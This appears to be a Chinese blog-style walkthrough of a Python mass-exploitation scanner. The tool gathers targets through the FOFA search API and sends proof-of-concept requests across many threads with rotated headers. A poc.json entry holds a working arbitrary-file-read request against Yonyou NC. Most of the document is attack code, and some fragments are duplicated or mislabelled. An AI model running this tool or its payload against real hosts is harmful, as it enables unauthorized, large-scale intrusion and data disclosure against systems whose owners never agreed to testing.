def main(): # 响应Ctrl+C停止程序 signal.signal(signal.SIGINT, quit) signal.signal(signal.SIGTERM, quit) showpocs() ## 获取目标 targetList = getTarget() ## 多线程批量请求验证 thread(targetList) ## 输出结果 putTarget(List)
第一部分为根据 -f Fofa语法
第二部分为根据 -u url / -i file / -f num(数目,默认为10)
def getTarget(): targetList=[] count=0 if result.poc==None: if result.outfile!=None and result.fofa!=None : # FOFA读取目标 if result.fofa!=None: qbase=result.fofa qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8") print("FOFA搜索:"+qbase) fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size=30" try: res=requests.get(fofa_url) results = json.loads(res.text) filepath=result.outfile with open(filepath,'w') as targets: for i in results['results']: targets.write(i[1]+'\n') print(i[1]) count+=1 print("搜索结果有"+str(count)+"条,已保存在"+filepath+"里!") except Exception as e: print(e) sys.exit() else: if result.url!=None or result.file!=None or result.fofa!=None: # 单个目标 if result.url!=None: targetList.append(result.url) # 文件读取目标 if result.file!=None: try: filepath=result.file with open(filepath,'r') as targets: for target in targets.readlines(): targetList.append(target.strip()) except Exception as e: print(e) # FOFA读取目标 if result.fofa!=None: qbase="" pocName = result.poc with open('poc.json',encoding='UTF-8') as f: data = json.load(f) for poc in data: if pocName == poc: qbase=data[poc]['fofa'] qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8") try: fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size="+str(result.fofa) res=requests.get(fofa_url) results = json.loads(res.text) print("FOFA搜索:"+qbase) print("搜索结果:"+str(result.fofa)+"条") for i in results['results']: targetList.append(i[1]) # print(targetList) except Exception as e: print(e) return targetList else : sys.exit("参错有误!缺少目标!")
def thread(targetList): ## 获取poc poc=poc_load() ## 填充队列 queueLock.acquire() for target in targetList: targetQueue.put(target) queueLock.release() ## 创建线程 threadList = [] threadNum=result.threadNum for i in range(0,threadNum): t=reqThread(targetQueue,poc) t.setDaemon(True) threadList.append(t) for i in threadList: i.start() # 等待所有线程完成 for t in threadList: t.join()
请求验证必须使用 -p pocName
# 加载poc def poc_load(): if result.poc!=None: poc = result.poc isPoc = False # POC是否存在 # 读取json文件 with open('poc.json',encoding='UTF-8') as f: data = json.load(f) for key in data: if poc == key: isPoc=True if isPoc==False: print("POC 不存在!") sys.exit("请通过--show查看poc列表!") else: return data[poc] else: pass
class reqThread (threading.Thread): def __init__(self, q,poc): threading.Thread.__init__(self) self.q = q self.poc=poc def run(self): try: while not self.q.empty(): queueLock.acquire() target=self.q.get() queueLock.release() if self.req(target): print(target+" is vuln !") List.append(target) else: pass except Exception as e: pass def req(self,url): poc=self.poc payload=urlParse(url)+poc['request']['url'] res=requests.request(method=poc['request']['method'],url=payload,headers=randomheaders(poc),proxies=getProxy(),data=poc['request']['data'],verify=False,timeout=5) if res.status_code==200 and poc['request']['confirm'] in res.text: return True else: return False
# 处理url def urlParse(url): if "https://" not in url: if "http://" in url: url=url else: url="http://"+url return url
# 代理 def urlParse(url): if "https://" not in url: if "http://" in url: url=url else: url="http://"+url return url
def randomHeaders(poc): headers={} uaList=[ 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/17D50 UCBrowser/ Mobile AliApp(TUnionSDK/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; OPPO R11t Build/OPM1.171019.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/ (Baidu; P1 8.1.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 SP-engine/2.14.0 main%2F1.0 baiduboxapp/ (Baidu; P2 13.3.1) NABar/0.0', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.10(0x17000a21) NetType/4G Language/zh_CN', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36', ] refList=[ "www.baidu.com" ] xffList=[ '', '', '', '', '', '', '', '', '', '', '', '', '' ] if 'User-Agent' in poc['request']['headers']: if poc['request']['headers']['User-Agent'].strip()!='': headers['User-Agent']=poc['request']['headers']['User-Agent'] else: headers['User-Agent']=random.choice(uaList) if 'referer' in poc['request']['headers']: if poc['request']['headers']['referer'].strip()!='': headers['referer']=poc['request']['headers']['referer'] else: headers['referer']=random.choice(refList) if 'X-Forwarded-For' in poc['request']['headers']: if poc['request']['headers']['User-Agent'].strip()!='': headers['X-Forwarded-For']=poc['request']['headers']['X-Forwarded-For'] else: headers['X-Forwarded-For']=random.choice(xffList) for key in poc['request']['headers']: if key != "referer" and key != "User-Agent" and key != "X-Forwarded-For": headers[key]=poc['request']['headers'][key] return headers
List=[] ## 输出 def putTarget(resultList): if result.file!=None or result.fofa!=None: if len(resultList)!=0 : if result.outfile != None : filepath=result.outfile with open(filepath,'w') as targets: for target in resultList: targets.write(target+'\n') print("验证结果有"+str(len(resultList))+"条,已保存在"+filepath+"里!") else: print("没有发现存在漏洞的目标!") else: pass
# 忽略https告警 requests.packages.urllib3.disable_warnings(InsecureRequestWarning) ## 队列 targetQueue = queue.Queue(100) ## 锁 queueLock = threading.Lock() # 结果 List=[] # FoFA email="" key=""
arg = ArgumentParser(description='POC_Verify') arg.add_argument('-u', dest='url',help='Target URL',type=str) arg.add_argument('-i', '--file', dest='file',help='Scan multiple targets given in a textual file',type=str) arg.add_argument('-f',"--fofa", dest='fofa',help='fofaquery Nums/String Example if poc -f 10 else -f "abc" default=30',default=10) arg.add_argument('-p', dest='poc',help=' Load POC file from poc.json') arg.add_argument('-proxy', dest='proxy',help='Use a proxy to connect to the target URL Example : -proxy http:',type=str) arg.add_argument('-t', dest='threadNum',help='the thread_count,default=10', type=int, default=10) arg.add_argument('-show', dest='show', help='show all pocs',nargs='?',const='all',type=str) arg.add_argument('-o', '--outfile', dest='outfile', help='the file save result', default='result.txt',type=str) result = arg.parse_args()
## 显示poc def showpocs(): isPoc = False if result.show != None: # 读取json文件 with open('poc.json',encoding='UTF-8') as f: data = json.load(f) if result.show== "all": print("pocname".ljust(20),"description".ljust(20)) print("----------------------------------------------") for key in data: print(key.ljust(20),data[key]['name'].ljust(20)) else: if result.show in data: print("pocname".ljust(20),"description".ljust(20)) print("----------------------------------------------") print(result.show.ljust(20),data[result.show]['name'].ljust(20)) sys.exit() else: pass
# 停止程序 def quit(signum, frame): print('You choose to stop me.') sys.exit() def main(): # 响应Ctrl+C停止程序 signal.signal(signal.SIGINT, quit) signal.signal(signal.SIGTERM, quit)
{ "pocname": { "name":"漏洞描述", "fofa":"fofa搜索字符串,特殊符号需要转义", "request": { "method": "", "url":"", "headers": { "referer": "", "User-Agent": "", "X-Forwarded-For": "", "Content-Type": "" }, "data": "", "confirm": "回显字符串" } }, "yonyounc": { "name": "用友NC 任意文件读取", "fofa":"app=\"用友-UFIDA-NC\"", "request": { "method": "get", "url": "/NCFindWeb?service=IPreAlertConfigService&filename=index.jsp", "headers": { "referer": "", "User-Agent": "", "X-Forwarded-For": "" }, "data": "", "confirm": "<%@ page language=" } } }
import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning from argparse import ArgumentParser import json import base64 import random import threading import queue import time import sys,signal # 忽略https告警 requests.packages.urllib3.disable_warnings(InsecureRequestWarning) ## 队列 targetQueue = queue.Queue(100) ## 锁 queueLock = threading.Lock() # 结果 List=[] # FoFA email="" key="" arg = ArgumentParser(description='POC_Verify') arg.add_argument('-u', dest='url',help='Target URL',type=str) arg.add_argument('-i', '--file', dest='file',help='Scan multiple targets given in a textual file',type=str) arg.add_argument('-f',"--fofa", dest='fofa',help='fofaquery Nums/String Example if poc -f 10 else -f "abc" default=30',default=10) arg.add_argument('-p', dest='poc',help=' Load POC file from poc.json') arg.add_argument('-proxy', dest='proxy',help='Use a proxy to connect to the target URL Example : -proxy http:',type=str) arg.add_argument('-t', dest='threadNum',help='the thread_count,default=10', type=int, default=10) arg.add_argument('-show', dest='show', help='show all pocs',nargs='?',const='all',type=str) arg.add_argument('-o', '--outfile', dest='outfile', help='the file save result', default='result.txt',type=str) result = arg.parse_args() class reqThread (threading.Thread): def __init__(self, q,poc): threading.Thread.__init__(self) self.q = q self.poc=poc def run(self): try: while not self.q.empty(): queueLock.acquire() target=self.q.get() queueLock.release() if self.req(target): print(target+" is vuln !") List.append(target) else: pass except Exception as e: pass def req(self,url): poc=self.poc payload=urlParse(url)+poc['request']['url'] res=requests.request(method=poc['request']['method'],url=payload,headers=randomHeaders(poc),proxies=getProxy(),data=poc['request']['data'],verify=False,timeout=5) if res.status_code==200 and poc['request']['confirm'] in res.text: return True else: return False ## IP代理 def getProxy(): proxy={} if result.proxy!= None: proxy[result.proxy[:result.proxy.index(":")]]=result.proxy[result.proxy.index(":")+1:] return proxy # 处理url def urlParse(url): if "https://" not in url: if "http://" in url: url=url else: url="http://"+url return url # 随机更换User-Agent、XFF、referer def randomHeaders(poc): headers={} uaList=[ 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/17D50 UCBrowser/ Mobile AliApp(TUnionSDK/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; OPPO R11t Build/OPM1.171019.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/ (Baidu; P1 8.1.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 SP-engine/2.14.0 main%2F1.0 baiduboxapp/ (Baidu; P2 13.3.1) NABar/0.0', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.10(0x17000a21) NetType/4G Language/zh_CN', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36', ] refList=[ "www.baidu.com" ] xffList=[ '', '', '', '', '', '', '', '', '', '', '', '', '' ] if 'User-Agent' in poc['request']['headers']: if poc['request']['headers']['User-Agent'].strip()!='': headers['User-Agent']=poc['request']['headers']['User-Agent'] else: headers['User-Agent']=random.choice(uaList) if 'referer' in poc['request']['headers']: if poc['request']['headers']['referer'].strip()!='': headers['referer']=poc['request']['headers']['referer'] else: headers['referer']=random.choice(refList) if 'X-Forwarded-For' in poc['request']['headers']: if poc['request']['headers']['User-Agent'].strip()!='': headers['X-Forwarded-For']=poc['request']['headers']['X-Forwarded-For'] else: headers['X-Forwarded-For']=random.choice(xffList) for key in poc['request']['headers']: if key != "referer" and key != "User-Agent" and key != "X-Forwarded-For": headers[key]=poc['request']['headers'][key] return headers # 获取目标 def getTarget(): targetList=[] count=0 if result.poc==None: if result.outfile!=None and result.fofa!=None : # FOFA读取目标 if result.fofa!=None: qbase=result.fofa qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8") print("FOFA搜索:"+qbase) fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size=30" try: res=requests.get(fofa_url) results = json.loads(res.text) filepath=result.outfile with open(filepath,'w') as targets: for i in results['results']: targets.write(i[1]+'\n') print(i[1]) count+=1 print("搜索结果有"+str(count)+"条,已保存在"+filepath+"里!") except Exception as e: print(e) sys.exit() else: if result.url!=None or result.file!=None or result.fofa!=None: # 单个目标 if result.url!=None: targetList.append(result.url) # 文件读取目标 if result.file!=None: try: filepath=result.file with open(filepath,'r') as targets: for target in targets.readlines(): targetList.append(target.strip()) except Exception as e: print(e) # FOFA读取目标 if result.fofa!=None: qbase="" pocName = result.poc with open('poc.json',encoding='UTF-8') as f: data = json.load(f) for poc in data: if pocName == poc: qbase=data[poc]['fofa'] qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8") try: fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size="+str(result.fofa) res=requests.get(fofa_url) results = json.loads(res.text) print("FOFA搜索:"+qbase) print("搜索结果:"+str(result.fofa)+"条") for i in results['results']: targetList.append(i[1]) # print(targetList) except Exception as e: print(e) return targetList else : sys.exit("参错有误!缺少目标!") # 加载poc def poc_load(): if result.poc!=None: poc = result.poc isPoc = False # 读取json文件 with open('poc.json',encoding='UTF-8') as f: data = json.load(f) for key in data: if poc == key: isPoc=True if isPoc==False: print("POC 不存在!") sys.exit("请通过--show查看poc列表!") else: return data[poc] else: pass ## 输出 def putTarget(resultList): if result.file!=None or result.fofa!=None: if len(resultList)!=0 : if result.outfile != None : filepath=result.outfile with open(filepath,'w') as targets: for target in resultList: targets.write(target+'\n') print("验证结果有"+str(len(resultList))+"条,已保存在"+filepath+"里!") else: print("没有发现存在漏洞的目标!") else: pass ## 显示poc def showpocs(): isPoc = False if result.show != None: # 读取json文件 with open('poc.json',encoding='UTF-8') as f: data = json.load(f) if result.show== "all": print("pocname".ljust(20),"description".ljust(20)) print("----------------------------------------------") for key in data: print(key.ljust(20),data[key]['name'].ljust(20)) else: if result.show in data: print("pocname".ljust(20),"description".ljust(20)) print("----------------------------------------------") print(result.show.ljust(20),data[result.show]['name'].ljust(20)) sys.exit() else: pass # 停止程序 def quit(signum, frame): print('You choose to stop me.') sys.exit() def thread(targetList): ## 获取poc poc=poc_load() ## 填充队列 queueLock.acquire() for target in targetList: targetQueue.put(target) queueLock.release() ## 创建线程 threadList = [] threadNum=result.threadNum for i in range(0,threadNum): t=reqThread(targetQueue,poc) t.setDaemon(True) threadList.append(t) for i in threadList: i.start() # 等待所有线程完成 for t in threadList: t.join() def main(): # 响应Ctrl+C停止程序 signal.signal(signal.SIGINT, quit) signal.signal(signal.SIGTERM, quit) showpocs() ## 获取目标 targetList = getTarget() ## 多线程批量请求验证 thread(targetList) ## 输出结果 putTarget(List) if __name__ == '__main__': main()
